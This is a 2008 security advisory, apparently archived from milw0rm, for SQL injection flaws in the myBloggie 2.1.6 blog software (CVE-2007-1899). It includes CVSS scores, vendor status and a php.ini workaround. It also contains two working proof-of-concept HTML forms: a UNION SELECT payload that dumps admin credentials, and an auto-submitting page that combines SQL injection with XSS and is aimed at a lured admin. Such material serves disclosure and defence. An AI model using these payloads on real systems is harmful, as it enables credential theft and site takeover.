netVigilance Security Advisory #40
myBloggie version 2.1.6 Multiple SQL Injection Vulnerability
Description:
myBloggie (http://mywebland.com/mybloggie/) is considered one of the
most simple, user-friendliest yet packed with features Weblog system
available to date. Built using PHP & mySQL, web most popular scripting
language & database system enable myBloggie to be installed in any
webservers.
A security problem in the product allows attackers to commit SQL injection.
External References:
Mitre CVE: CVE-2007-1899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899
NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899
OSVDB:
Summary:
myBloggie is weblog system built using PHP & mySQL, the webs most
popular scripting language & database system which enable myBloggie to
be installed in any webserver.
Successful exploitation requires PHP magic_quotes_gpc set to Off and
register_globals set to “Onâ€.
Advisory URL:
http://www.netvigilance.com/advisory0040
Release Date: June 30th 2008
Severity/Risk: Medium
CVSS 2.0 Metrics
Access Vector: Network
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
CVSS 2.0 Base Score: 5.1
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
Vulnerability Impact: Attack
Host Impact: SQL Injection.
SecureScout Testcase ID: TC 17969
Vulnerable Systems:
myBloggie version 2.1.6
Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts.
This could be exploited to obtain sensitive data, modify database
contents or acquire administrator’s privileges.
Vendor:
myWebland (http://mywebland.com/)
Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.
Workaround:
In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off
Example:
SQL Injection Vulnerability 1:
Create html file with the next content:
<html>
<body>
<form
action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser"
method="POST">
<input type="submit" name="user_id" value="1 #' UNION SELECT
CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1
FROM `mb_user` /*">
</form>
</body>
</html>
REQUEST:
Browse this file and click on the button
REPLY:
<tr><td colspan="3" class="spacer6"></td></tr>
<tr><td></td><td></td><td align="right">
<span class="f10pxgrey">Category : <a class="std"
href="?mode=viewcat&cat_id=1">
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN
PASSWORD]</a>
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif"
alt="" />
<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |
<img src="./templates/aura/images/trackback.gif" />
SQL Injection Vulnerability 2:
(SQL Injection + XSS Attack Vulnerability)
Create html file with the next content and place it for example on
http://somedomain.com/file.html:
<html>
<body onLoad="document.forms(0).submit();">
<form action="
http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit"
method="POST"> <input type="hidden" name="post_id" value="-1' UNION
SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`),
'</textarea><script>alert(document.post.subject.value)</script>', 5,6,7
FROM `mb_user`#">
</form>
</body>
</html>
REQUEST:
Induce a Mybloggie admin to browse the malicious page.
http:// somedomain.com/file.html
REPLY:
Page containing username and password for Mybloggie admin account.
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
# milw0rm.com [2008-06-30]